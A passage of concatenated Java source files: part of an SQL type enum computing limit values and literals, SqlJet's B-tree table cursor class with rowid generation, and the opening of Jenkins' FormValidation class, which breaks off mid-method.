* <td>-1</td>
* <td>-2147483648 (-2 ^ 31 = MININT)</td>
* </tr>
* <tr>
* <td>Boolean</td>
* <td>true</td>
* <td>true</td>
* <td>false</td>
* <td>-1</td>
* <td>-1</td>
* <td>TRUE</td>
* </tr>
* <tr>
* <td>Varchar</td>
* <td>true</td>
* <td>true</td>
* <td>false</td>
* <td>10</td>
* <td>-1</td>
* <td>'ZZZZZZZZZZ'</td>
* </tr>
* </table>
*
* @param sign If true, returns upper limit, otherwise lower limit
* @param limit If true, returns value at or near to overflow; otherwise
* value at or near to underflow
* @param beyond If true, returns the value just beyond the limit,
* otherwise the value at the limit
* @param precision Precision, or -1 if not applicable
* @param scale Scale, or -1 if not applicable
* @return Limit value
*/
public Object getLimit(
boolean sign,
Limit limit,
boolean beyond,
int precision,
int scale) {
assert allowsPrecScale(precision != -1, scale != -1) : this;
if (limit == Limit.ZERO) {
if (beyond) {
return null;
}
sign = true;
}
Calendar calendar;
switch (this) {
case BOOLEAN:
switch (limit) {
case ZERO:
return false;
case UNDERFLOW:
return null;
case OVERFLOW:
if (beyond || !sign) {
return null;
} else {
return true;
}
default:
throw Util.unexpected(limit);
}
case TINYINT:
return getNumericLimit(2, 8, sign, limit, beyond);
case SMALLINT:
return getNumericLimit(2, 16, sign, limit, beyond);
case INTEGER:
return getNumericLimit(2, 32, sign, limit, beyond);
case BIGINT:
return getNumericLimit(2, 64, sign, limit, beyond);
case DECIMAL:
BigDecimal decimal =
getNumericLimit(10, precision, sign, limit, beyond);
if (decimal == null) {
return null;
}
// Decimal values must fit into 64 bits. So, the maximum value of
// a DECIMAL(19, 0) is 2^63 - 1, not 10^19 - 1.
switch (limit) {
case OVERFLOW:
final BigDecimal other =
(BigDecimal) BIGINT.getLimit(sign, limit, beyond, -1, -1);
if (decimal.compareTo(other) == (sign ? 1 : -1)) {
decimal = other;
}
}
// Apply scale.
if (scale == 0) {
// do nothing
} else if (scale > 0) {
decimal = decimal.divide(BigDecimal.TEN.pow(scale));
} else {
decimal = decimal.multiply(BigDecimal.TEN.pow(-scale));
}
return decimal;
case CHAR:
case VARCHAR:
if (!sign) {
return null; // this type does not have negative values
}
StringBuilder buf = new StringBuilder();
switch (limit) {
case ZERO:
break;
case UNDERFLOW:
if (beyond) {
// There is no value between the empty string and the
// smallest non-empty string.
return null;
}
buf.append("a");
break;
case OVERFLOW:
for (int i = 0; i < precision; ++i) {
buf.append("Z");
}
if (beyond) {
buf.append("Z");
}
break;
}
return buf.toString();
case BINARY:
case VARBINARY:
if (!sign) {
return null; // this type does not have negative values
}
byte[] bytes;
switch (limit) {
case ZERO:
bytes = new byte[0];
break;
case UNDERFLOW:
if (beyond) {
// There is no value between the empty string and the
// smallest value.
return null;
}
bytes = new byte[]{0x00};
break;
case OVERFLOW:
bytes = new byte[precision + (beyond ? 1 : 0)];
Arrays.fill(bytes, (byte) 0xff);
break;
default:
throw Util.unexpected(limit);
}
return bytes;
case DATE:
calendar = Util.calendar();
switch (limit) {
case ZERO:
// The epoch.
calendar.set(Calendar.YEAR, 1970);
calendar.set(Calendar.MONTH, 0);
calendar.set(Calendar.DAY_OF_MONTH, 1);
break;
case UNDERFLOW:
return null;
case OVERFLOW:
if (beyond) {
// It is impossible to represent an invalid year as a date
// literal. SQL dates are represented as 'yyyy-mm-dd', and
// 1 <= yyyy <= 9999 is valid. There is no year 0: the year
// before 1AD is 1BC, so SimpleDateFormat renders the day
// before 0001-01-01 (AD) as 0001-12-31 (BC), which looks
// like a valid date.
return null;
}
// "SQL:2003 6.1 <data type> Access Rules 6" says that year is
// between 1 and 9999, and days/months are the valid Gregorian
// calendar values for these years.
if (sign) {
calendar.set(Calendar.YEAR, 9999);
calendar.set(Calendar.MONTH, 11);
calendar.set(Calendar.DAY_OF_MONTH, 31);
} else {
calendar.set(Calendar.YEAR, 1);
calendar.set(Calendar.MONTH, 0);
calendar.set(Calendar.DAY_OF_MONTH, 1);
}
break;
}
calendar.set(Calendar.HOUR_OF_DAY, 0);
calendar.set(Calendar.MINUTE, 0);
calendar.set(Calendar.SECOND, 0);
return calendar;
case TIME:
if (!sign) {
return null; // this type does not have negative values
}
if (beyond) {
return null; // invalid values are impossible to represent
}
calendar = Util.calendar();
switch (limit) {
case ZERO:
// The epoch.
calendar.set(Calendar.HOUR_OF_DAY, 0);
calendar.set(Calendar.MINUTE, 0);
calendar.set(Calendar.SECOND, 0);
calendar.set(Calendar.MILLISECOND, 0);
break;
case UNDERFLOW:
return null;
case OVERFLOW:
calendar.set(Calendar.HOUR_OF_DAY, 23);
calendar.set(Calendar.MINUTE, 59);
calendar.set(Calendar.SECOND, 59);
int millis =
(precision >= 3) ? 999
: ((precision == 2) ? 990 : ((precision == 1) ? 900 : 0));
calendar.set(Calendar.MILLISECOND, millis);
break;
}
return calendar;
case TIMESTAMP:
calendar = Util.calendar();
switch (limit) {
case ZERO:
// The epoch.
calendar.set(Calendar.YEAR, 1970);
calendar.set(Calendar.MONTH, 0);
calendar.set(Calendar.DAY_OF_MONTH, 1);
calendar.set(Calendar.HOUR_OF_DAY, 0);
calendar.set(Calendar.MINUTE, 0);
calendar.set(Calendar.SECOND, 0);
calendar.set(Calendar.MILLISECOND, 0);
break;
case UNDERFLOW:
return null;
case OVERFLOW:
if (beyond) {
// It is impossible to represent an invalid year as a date
// literal. SQL dates are represented as 'yyyy-mm-dd', and
// 1 <= yyyy <= 9999 is valid. There is no year 0: the year
// before 1AD is 1BC, so SimpleDateFormat renders the day
// before 0001-01-01 (AD) as 0001-12-31 (BC), which looks
// like a valid date.
return null;
}
// "SQL:2003 6.1 <data type> Access Rules 6" says that year is
// between 1 and 9999, and days/months are the valid Gregorian
// calendar values for these years.
if (sign) {
calendar.set(Calendar.YEAR, 9999);
calendar.set(Calendar.MONTH, 11);
calendar.set(Calendar.DAY_OF_MONTH, 31);
calendar.set(Calendar.HOUR_OF_DAY, 23);
calendar.set(Calendar.MINUTE, 59);
calendar.set(Calendar.SECOND, 59);
int millis =
(precision >= 3) ? 999
: ((precision == 2) ? 990
: ((precision == 1) ? 900 : 0));
calendar.set(Calendar.MILLISECOND, millis);
} else {
calendar.set(Calendar.YEAR, 1);
calendar.set(Calendar.MONTH, 0);
calendar.set(Calendar.DAY_OF_MONTH, 1);
calendar.set(Calendar.HOUR_OF_DAY, 0);
calendar.set(Calendar.MINUTE, 0);
calendar.set(Calendar.SECOND, 0);
calendar.set(Calendar.MILLISECOND, 0);
}
break;
}
return calendar;
default:
throw Util.unexpected(this);
}
}
/**
* Returns the minimum precision (or length) allowed for this type, or -1 if
* precision/length are not applicable for this type.
*
* @return Minimum allowed precision
*/
public int getMinPrecision() {
switch (this) {
case DECIMAL:
case VARCHAR:
case CHAR:
case VARBINARY:
case BINARY:
case TIME:
case TIME_WITH_LOCAL_TIME_ZONE:
case TIMESTAMP:
case TIMESTAMP_WITH_LOCAL_TIME_ZONE:
return 1;
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
case INTERVAL_DAY:
case INTERVAL_DAY_HOUR:
case INTERVAL_DAY_MINUTE:
case INTERVAL_DAY_SECOND:
case INTERVAL_HOUR:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_HOUR_SECOND:
case INTERVAL_MINUTE:
case INTERVAL_MINUTE_SECOND:
case INTERVAL_SECOND:
return MIN_INTERVAL_START_PRECISION;
default:
return -1;
}
}
/**
* Returns the minimum scale (or fractional second precision in the case of
* intervals) allowed for this type, or -1 if precision/length are not
* applicable for this type.
*
* @return Minimum allowed scale
*/
public int getMinScale() {
switch (this) {
// TODO: Minimum numeric scale for decimal
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
case INTERVAL_DAY:
case INTERVAL_DAY_HOUR:
case INTERVAL_DAY_MINUTE:
case INTERVAL_DAY_SECOND:
case INTERVAL_HOUR:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_HOUR_SECOND:
case INTERVAL_MINUTE:
case INTERVAL_MINUTE_SECOND:
case INTERVAL_SECOND:
return MIN_INTERVAL_FRACTIONAL_SECOND_PRECISION;
default:
return -1;
}
}
/** Returns {@code HOUR} for {@code HOUR TO SECOND} and
* {@code HOUR}, {@code SECOND} for {@code SECOND}. */
public TimeUnit getStartUnit() {
switch (this) {
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
return TimeUnit.YEAR;
case INTERVAL_MONTH:
return TimeUnit.MONTH;
case INTERVAL_DAY:
case INTERVAL_DAY_HOUR:
case INTERVAL_DAY_MINUTE:
case INTERVAL_DAY_SECOND:
return TimeUnit.DAY;
case INTERVAL_HOUR:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_HOUR_SECOND:
return TimeUnit.HOUR;
case INTERVAL_MINUTE:
case INTERVAL_MINUTE_SECOND:
return TimeUnit.MINUTE;
case INTERVAL_SECOND:
return TimeUnit.SECOND;
default:
throw new AssertionError(this);
}
}
/** Returns {@code SECOND} for both {@code HOUR TO SECOND} and
* {@code SECOND}. */
public TimeUnit getEndUnit() {
switch (this) {
case INTERVAL_YEAR:
return TimeUnit.YEAR;
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
return TimeUnit.MONTH;
case INTERVAL_DAY:
return TimeUnit.DAY;
case INTERVAL_DAY_HOUR:
case INTERVAL_HOUR:
return TimeUnit.HOUR;
case INTERVAL_DAY_MINUTE:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_MINUTE:
return TimeUnit.MINUTE;
case INTERVAL_DAY_SECOND:
case INTERVAL_HOUR_SECOND:
case INTERVAL_MINUTE_SECOND:
case INTERVAL_SECOND:
return TimeUnit.SECOND;
default:
throw new AssertionError(this);
}
}
public boolean isYearMonth() {
switch (this) {
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
return true;
default:
return false;
}
}
/** Limit. */
public enum Limit {
ZERO, UNDERFLOW, OVERFLOW
}
private BigDecimal getNumericLimit(
int radix,
int exponent,
boolean sign,
Limit limit,
boolean beyond) {
switch (limit) {
case OVERFLOW:
// 2-based schemes run from -2^(N-1) to 2^(N-1)-1 e.g. -128 to +127
// 10-based schemas run from -(10^N-1) to 10^N-1 e.g. -99 to +99
final BigDecimal bigRadix = BigDecimal.valueOf(radix);
if (radix == 2) {
--exponent;
}
BigDecimal decimal = bigRadix.pow(exponent);
if (sign || (radix != 2)) {
decimal = decimal.subtract(BigDecimal.ONE);
}
if (beyond) {
decimal = decimal.add(BigDecimal.ONE);
}
if (!sign) {
decimal = decimal.negate();
}
return decimal;
case UNDERFLOW:
return beyond ? null
: (sign ? BigDecimal.ONE : BigDecimal.ONE.negate());
case ZERO:
return BigDecimal.ZERO;
default:
throw Util.unexpected(limit);
}
}
public SqlLiteral createLiteral(Object o, SqlParserPos pos) {
switch (this) {
case BOOLEAN:
return SqlLiteral.createBoolean((Boolean) o, pos);
case TINYINT:
case SMALLINT:
case INTEGER:
case BIGINT:
case DECIMAL:
return SqlLiteral.createExactNumeric(o.toString(), pos);
case VARCHAR:
case CHAR:
return SqlLiteral.createCharString((String) o, pos);
case VARBINARY:
case BINARY:
return SqlLiteral.createBinaryString((byte[]) o, pos);
case DATE:
return SqlLiteral.createDate(o instanceof Calendar
? DateString.fromCalendarFields((Calendar) o)
: (DateString) o, pos);
case TIME:
return SqlLiteral.createTime(o instanceof Calendar
? TimeString.fromCalendarFields((Calendar) o)
: (TimeString) o, 0 /* todo */, pos);
case TIMESTAMP:
return SqlLiteral.createTimestamp(o instanceof Calendar
? TimestampString.fromCalendarFields((Calendar) o)
: (TimestampString) o, 0 /* todo */, pos);
default:
throw Util.unexpected(this);
}
}
/** Returns the name of this type. */
public String getName() {
return toString();
}
/**
* Flags indicating precision/scale combinations.
*
* <p>Note: for intervals:
*
* <ul>
* <li>precision = start (leading field) precision</li>
* <li>scale = fractional second precision</li>
* </ul>
*/
private interface PrecScale {
int NO_NO = 1;
int YES_NO = 2;
int YES_YES = 4;
}
}
|
|
/**
* SqlJetTableWrapper.java
* Copyright (C) 2009-2013 TMate Software Ltd
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
package org.tmatesoft.sqljet.core.internal.table;
import java.util.List;
import java.util.Random;
import java.util.Stack;
import org.tmatesoft.sqljet.core.SqlJetEncoding;
import org.tmatesoft.sqljet.core.SqlJetErrorCode;
import org.tmatesoft.sqljet.core.SqlJetException;
import org.tmatesoft.sqljet.core.SqlJetValueType;
import org.tmatesoft.sqljet.core.internal.ISqlJetBtree;
import org.tmatesoft.sqljet.core.internal.ISqlJetBtreeCursor;
import org.tmatesoft.sqljet.core.internal.ISqlJetMemoryPointer;
import org.tmatesoft.sqljet.core.internal.ISqlJetVdbeMem;
import org.tmatesoft.sqljet.core.internal.SqlJetBtreeTableCreateFlags;
import org.tmatesoft.sqljet.core.internal.SqlJetUtility;
import org.tmatesoft.sqljet.core.internal.vdbe.SqlJetBtreeRecord;
import org.tmatesoft.sqljet.core.internal.vdbe.SqlJetKeyInfo;
/**
* @author TMate Software Ltd.
* @author Sergey Scherbina ([email protected])
*
*/
public class SqlJetBtreeTable implements ISqlJetBtreeTable {
protected ISqlJetBtree btree;
protected int rootPage;
protected boolean write;
protected boolean index;
private long priorNewRowid = 0;
private SqlJetBtreeRecord recordCache;
private Object[] valueCache;
private Object[] valuesCache;
private Stack<State> states;
protected static class State {
private ISqlJetBtreeCursor cursor;
private SqlJetKeyInfo keyInfo;
public State(ISqlJetBtreeCursor cursor, SqlJetKeyInfo keyInfo) {
this.cursor = cursor;
this.keyInfo = keyInfo;
}
public ISqlJetBtreeCursor getCursor() {
return cursor;
}
public SqlJetKeyInfo getKeyInfo() {
return keyInfo;
}
public void close() throws SqlJetException {
if (cursor != null) {
cursor.closeCursor();
}
}
}
/**
* @param db
* @param btree
* @param rootPage
* @param write
* @param index
* @throws SqlJetException
*/
public SqlJetBtreeTable(ISqlJetBtree btree, int rootPage, boolean write, boolean index) throws SqlJetException {
init(btree, rootPage, write, index);
}
/**
* @param db
* @param btree
* @param rootPage
* @param write
* @param index
* @throws SqlJetException
*/
private void init(ISqlJetBtree btree, int rootPage, boolean write, boolean index) throws SqlJetException {
this.states = new Stack<State>();
this.btree = btree;
this.rootPage = rootPage;
this.write = write;
this.index = index;
pushState();
first();
}
private State getCurrentState() {
assert !states.isEmpty();
return states.peek();
}
protected ISqlJetBtreeCursor getCursor() {
return getCurrentState().getCursor();
}
protected SqlJetKeyInfo getKeyInfo() {
return getCurrentState().getKeyInfo();
}
public void pushState() throws SqlJetException {
SqlJetKeyInfo keyInfo = null;
if (index) {
keyInfo = new SqlJetKeyInfo();
keyInfo.setEnc(btree.getDb().getOptions().getEncoding());
}
ISqlJetBtreeCursor cursor = btree.getCursor(rootPage, write, index ? keyInfo : null);
states.push(new State(cursor, keyInfo));
clearRecordCache();
adjustKeyInfo();
}
protected void adjustKeyInfo() throws SqlJetException {
}
public boolean popState() throws SqlJetException {
if (states.size() <= 1) {
return false;
}
State oldState = states.pop();
oldState.close();
clearRecordCache();
return true;
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.internal.btree.ISqlJetBtreeTable#close()
*/
public void close() throws SqlJetException {
while(popState()) {}
clearRecordCache();
getCurrentState().close();
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#unlock()
*/
public void unlock() {
getCursor().leaveCursor();
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#lock()
*/
public void lock() throws SqlJetException {
getCursor().enterCursor();
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.internal.btree.ISqlJetBtreeTable#eof()
*/
public boolean eof() throws SqlJetException {
hasMoved();
return getCursor().eof();
}
/**
* @throws SqlJetException
*/
public boolean hasMoved() throws SqlJetException {
getCursor().enterCursor();
try {
return getCursor().cursorHasMoved();
} finally {
getCursor().leaveCursor();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#first()
*/
public boolean first() throws SqlJetException {
lock();
try {
clearRecordCache();
return !getCursor().first();
} finally {
unlock();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#last()
*/
public boolean last() throws SqlJetException {
lock();
try {
clearRecordCache();
return !getCursor().last();
} finally {
unlock();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.internal.btree.ISqlJetBtreeTable#next()
*/
public boolean next() throws SqlJetException {
lock();
try {
clearRecordCache();
hasMoved();
return !getCursor().next();
} finally {
unlock();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#previous()
*/
public boolean previous() throws SqlJetException {
lock();
try {
clearRecordCache();
hasMoved();
return !getCursor().previous();
} finally {
unlock();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.internal.btree.ISqlJetBtreeTable#getRecord
*/
public ISqlJetBtreeRecord getRecord() throws SqlJetException {
if (eof())
return null;
if (null == recordCache) {
lock();
try {
recordCache = new SqlJetBtreeRecord(getCursor(), index, btree.getDb().getOptions().getFileFormat());
} finally {
unlock();
}
valueCache = new Object[recordCache.getFieldsCount()];
}
return recordCache;
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#lockTable(
* boolean)
*/
public void lockTable(boolean write) {
btree.lockTable(rootPage, write);
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getEncoding()
*/
public SqlJetEncoding getEncoding() throws SqlJetException {
return getCursor().getCursorDb().getOptions().getEncoding();
}
protected static boolean checkField(ISqlJetBtreeRecord record, int field) throws SqlJetException {
return (field >= 0 && record != null && field < record.getFieldsCount());
}
protected ISqlJetVdbeMem getValueMem(int field) throws SqlJetException {
final ISqlJetBtreeRecord r = getRecord();
if (null == r)
return null;
if (!checkField(r, field))
return null;
final List<ISqlJetVdbeMem> fields = r.getFields();
if (null == fields)
return null;
return fields.get(field);
}
public Object getValue(int field) throws SqlJetException {
if (valueCache != null && field < valueCache.length) {
final Object valueCached = valueCache[field];
if (valueCached != null)
return valueCached;
}
final Object valueUncached = getValueUncached(field);
if (valueUncached != null) {
valueCache[field] = valueUncached;
}
return valueUncached;
}
public Object getValueUncached(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return null;
switch (value.getType()) {
case INTEGER:
return value.intValue();
case FLOAT:
return value.realValue();
case TEXT:
return SqlJetUtility.toString(value.valueText(getEncoding()), getEncoding());
case BLOB:
return value.valueBlob();
case NULL:
break;
default:
break;
}
return null;
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getFieldsCount
* ()
*/
public int getFieldsCount() throws SqlJetException {
final ISqlJetBtreeRecord r = getRecord();
if (null == r)
return 0;
return r.getFieldsCount();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#isNull(int)
*/
public boolean isNull(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (null == value)
return true;
return value.isNull();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getString(int)
*/
public String getString(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return null;
return SqlJetUtility.toString(value.valueText(getEncoding()), getEncoding());
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getInteger
* (int)
*/
public long getInteger(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return 0;
return value.intValue();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getReal(int)
*/
public double getFloat(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return 0;
return value.realValue();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getFieldType
* (int)
*/
public SqlJetValueType getFieldType(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null)
return SqlJetValueType.NULL;
return value.getType();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getBlob(int)
*/
public ISqlJetMemoryPointer getBlob(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return null;
return value.valueBlob();
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getValues()
*/
public Object[] getValues() throws SqlJetException {
if (valuesCache != null) {
return valuesCache;
} else {
final ISqlJetBtreeRecord record = getRecord();
final int fieldsCount = record.getFieldsCount();
for (int i = 0; i < fieldsCount; i++) {
valueCache[i] = getValue(i);
}
valuesCache = valueCache;
return valueCache;
}
}
public long newRowId() throws SqlJetException {
return newRowId(0);
}
/**
* Get a new integer record number (a.k.a "rowid") used as the key to a
* table. The record number is not previously used as a key in the database
* table that cursor P1 points to. The new record number is written written
* to register P2.
*
* Prev is the largest previously generated record number. No new record
* numbers are allowed to be less than this value. When this value reaches
* its maximum, a SQLITE_FULL error is generated. This mechanism is used to
* help implement the AUTOINCREMENT feature.
*
* @param prev
* @return
* @throws SqlJetException
*/
public long newRowId(long prev) throws SqlJetException {
/*
* The next rowid or record number (different terms for the same thing)
* is obtained in a two-step algorithm. First we attempt to find the
* largest existing rowid and add one to that. But if the largest
* existing rowid is already the maximum positive integer, we have to
* fall through to the second probabilistic algorithm. The second
* algorithm is to select a rowid at random and see if it already exists
* in the table. If it does not exist, we have succeeded. If the random
* rowid does exist, we select a new one and try again, up to 1000
* times.For a table with less than 2 billion entries, the probability
* of not finding a unused rowid is about 1.0e-300. This is a non-zero
* probability, but it is still vanishingly small and should never cause
* a problem. You are much, much more likely to have a hardware failure
* than for this algorithm to fail.
*
* To promote locality of reference for repetitive inserts, the first
* few attempts at choosing a random rowid pick values just a little
* larger than the previous rowid. This has been shown experimentally to
* double the speed of the COPY operation.
*/
lock();
try {
boolean useRandomRowid = false;
long v = 0;
int res = 0;
int cnt = 0;
if ((getCursor().flags() & (SqlJetBtreeTableCreateFlags.INTKEY.getValue() | SqlJetBtreeTableCreateFlags.ZERODATA
.getValue())) != SqlJetBtreeTableCreateFlags.INTKEY.getValue()) {
throw new SqlJetException(SqlJetErrorCode.CORRUPT);
}
assert ((getCursor().flags() & SqlJetBtreeTableCreateFlags.INTKEY.getValue()) != 0);
assert ((getCursor().flags() & SqlJetBtreeTableCreateFlags.ZERODATA.getValue()) == 0);
long MAX_ROWID = 0x7fffffff;
final boolean last = getCursor().last();
if (last) {
v = 1;
} else {
v = getCursor().getKeySize();
if (v == MAX_ROWID) {
useRandomRowid = true;
} else {
v++;
}
if (prev != 0) {
if (prev == MAX_ROWID || useRandomRowid) {
throw new SqlJetException(SqlJetErrorCode.FULL);
}
if (v < prev) {
v = prev + 1;
}
}
if (useRandomRowid) {
v = priorNewRowid;
Random random = new Random();
/* SQLITE_FULL must have occurred prior to this */
assert (prev == 0);
cnt = 0;
do {
if (cnt == 0 && (v & 0xffffff) == v) {
v++;
} else {
v = random.nextInt();
if (cnt < 5)
v &= 0xffffff;
}
if (v == 0)
continue;
res = getCursor().moveToUnpacked(null, v, false);
cnt++;
} while (cnt < 100 && res == 0);
priorNewRowid = v;
if (res == 0) {
throw new SqlJetException(SqlJetErrorCode.FULL);
}
}
}
return v;
} finally {
unlock();
}
}
protected void clearRecordCache() {
recordCache = null;
valuesCache = null;
valueCache = null;
}
public void clear() throws SqlJetException {
btree.clearTable(rootPage, null);
}
public long getKeySize() throws SqlJetException {
return getCursor().getKeySize();
}
public int moveTo(ISqlJetMemoryPointer pKey, long nKey, boolean bias) throws SqlJetException {
clearRecordCache();
return getCursor().moveTo(pKey, nKey, bias);
}
/**
* @param object
* @param rowId
* @param pData
* @param remaining
* @param i
* @param b
* @throws SqlJetException
*/
public void insert(ISqlJetMemoryPointer pKey, long nKey, ISqlJetMemoryPointer pData, int nData, int nZero,
boolean bias) throws SqlJetException {
clearRecordCache();
getCursor().insert(pKey, nKey, pData, nData, nZero, bias);
}
/**
* @throws SqlJetException
*
*/
public void delete() throws SqlJetException {
clearRecordCache();
getCursor().delete();
}
}
|
|
/*
* The MIT License
*
* Copyright (c) 2004-2009, Sun Microsystems, Inc.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package hudson.util;
import hudson.EnvVars;
import hudson.Functions;
import hudson.Launcher;
import hudson.ProxyConfiguration;
import hudson.RelativePath;
import hudson.Util;
import hudson.FilePath;
import hudson.model.AbstractBuild;
import hudson.model.BuildListener;
import hudson.model.Descriptor;
import hudson.tasks.Builder;
import hudson.util.ReflectionUtils.Parameter;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.HttpResponse;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.StaplerRequest;
import org.kohsuke.stapler.StaplerResponse;
import org.kohsuke.stapler.Stapler;
import org.springframework.util.StringUtils;
import javax.annotation.Nonnull;
import javax.servlet.ServletException;
import java.io.File;
import java.io.IOException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLConnection;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import java.util.Locale;
import static hudson.Functions.jsStringEscape;
import static hudson.Util.*;
/**
* Represents the result of the form field validation.
*
* <p>
* Use one of the factory methods to create an instance, then return it from your <tt>doCheckXyz</tt>
* method. (Via {@link HttpResponse}, the returned object will render the result into {@link StaplerResponse}.)
* This way of designing form field validation allows you to reuse {@code doCheckXyz()} methods
* programmatically as well (by using {@link #kind}.
*
* <p>
* For typical validation needs, this class offers a number of {@code validateXXX(...)} methods, such as
* {@link #validateExecutable(String)}. {@link FilePath} also has a number of {@code validateXXX(...)} methods
* that you may be able to reuse.
*
* <p>
* Also see <tt>doCheckCvsRoot</tt> in <tt>CVSSCM</tt> as an example.
*
* <p>
* This class extends {@link IOException} so that it can be thrown from a method. This allows one to reuse
* the checking logic as a part of the real computation, such as:
*
* <pre>
* String getAntVersion(File antHome) throws FormValidation {
* if(!antHome.isDirectory())
* throw FormValidation.error(antHome+" doesn't look like a home directory");
* ...
* return IOUtils.toString(new File(antHome,"version"));
* }
*
* ...
*
* public FormValidation doCheckAntVersion(@QueryParameter String f) {
* try {
* return ok(getAntVersion(new File(f)));
* } catch (FormValidation f) {
* return f;
* }
* }
*
* ...
*
* public void {@linkplain Builder#perform(AbstractBuild, Launcher, BuildListener) perform}(...) {
* String version = getAntVersion(antHome);
* ...
* }
* </pre>
*
* @author Kohsuke Kawaguchi
* @since 1.294
*/
public abstract class FormValidation extends IOException implements HttpResponse {
/**
* Indicates the kind of result.
*/
public enum Kind {
/**
* Form field value was OK and no problem was detected.
*/
OK,
/**
* Form field value contained something suspicious. For some limited use cases
* the value could be valid, but we suspect the user made a mistake.
*/
WARNING,
/**
* Form field value contained a problem that should be corrected.
*/
ERROR
}
/**
* Sends out a string error message that indicates an error.
*
* @param message
* Human readable message to be sent. <tt>error(null)</tt>
* can be used as <tt>ok()</tt>.
*/
public static FormValidation error(String message) {
return errorWithMarkup(message==null?null: Util.escape(message));
}
public static FormValidation warning(String message) {
return warningWithMarkup(message==null?null:Util.escape(message));
}
public static FormValidation ok(String message) {
return okWithMarkup(message==null?null:Util.escape(message));
}
/**
* Singleton instance that represents "OK".
*/
private static final FormValidation OK = respond(Kind.OK,"<div/>");
public static FormValidation ok() {
return OK;
}
/**
* Sends out a string error message that indicates an error,
* by formatting it with {@link String#format(String, Object[])}
*/
public static FormValidation error(String format, Object... args) {
return error(String.format(format,args));
}
public static FormValidation warning(String format, Object... args) {
return warning(String.format(format,args));
}
public static FormValidation ok(String format, Object... args) {
return ok(String.format(format,args));
}
/**
* Sends out a string error message, with optional "show details" link that expands to the full stack trace.
*
* <p>
* Use this with caution, so that anonymous users do not gain too much insights into the state of the system,
* as error stack trace often reveals a lot of information. Consider if a check operation needs to be exposed
* to everyone or just those who have higher access to job/hudson/etc.
*/
public static FormValidation error(Throwable e, String message) {
